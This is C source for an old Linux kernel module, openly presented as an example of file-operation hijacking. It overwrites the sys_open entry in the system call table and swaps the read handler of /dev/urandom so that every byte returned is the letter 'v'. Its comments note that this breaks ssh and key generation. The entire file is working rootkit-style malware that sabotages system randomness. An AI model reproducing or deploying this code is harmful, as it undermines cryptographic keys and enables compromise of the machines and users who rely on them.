#define MODULE
#define __KERNEL__

#include <linux/config.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/major.h>
#include <linux/string.h>
#include <linux/fcntl.h>
#include <linux/slab.h>
#include <linux/random.h>
#include <linux/poll.h>
#include <linux/init.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/errno.h>

#include <sys/syscall.h>

/*
 * example of simple file ops function hijacking
 *
 * on this module read of /dev/urandom return always and only 'v', this
 * can compromise a lot security (think to ssh and key generation ...)
 *
 * simple and lamer code by vecna@s0ftpj.org
 *
 * UEEEEEEEEEEEEEEEEEE`EEEEEEEE`EEEEEEEEEEE`EEEEEEEEE`EEEEEEEE`EEEEE`
 */
static int (*linux_open)(const char *, int, int);
static int (*urandom_read)(struct file *, char *, size_t, loff_t *);

extern void *sys_call_table[];

/* hijack urandom_read (not also random_read!) */
static int ddcr_read(struct file *file, char *buf, size_t len, loff_t *pos)
	{
	static char fakebyte='v';
	int ret, i;


	ret =urandom_read(file, buf, len, pos);

	for(i =0; i < len; i++)
		__generic_copy_to_user(&buf[i], (void *)&fakebyte, 1);
	
	return ret;
	}

/* hijack sys_open */
static int ddcr_open(const char *fname, int flags, int mode)
	{
	int ret =linux_open(fname, flags, mode);

	if(ret >= 0 && !strcmp(fname, "/dev/urandom"))
		{
		struct file *uran =fget(ret);

		if(urandom_read ==NULL)
			urandom_read =(void *)uran->f_op->read;

		uran->f_op->read =ddcr_read;

		fput(uran);
		}

	return ret;
	}

int init_module(void)
	{
	/* I love stock 84 */
	printk(KERN_INFO "loading urandom's fucker \n");
		
	linux_open =sys_call_table[SYS_open];
	sys_call_table[SYS_open] =ddcr_open;

	return(0);
	}

void cleanup_module(void)
	{
	printk(KERN_INFO "unloading module, could /dev/urandom take kernelp\n");

	sys_call_table[SYS_open] =linux_open;
	}
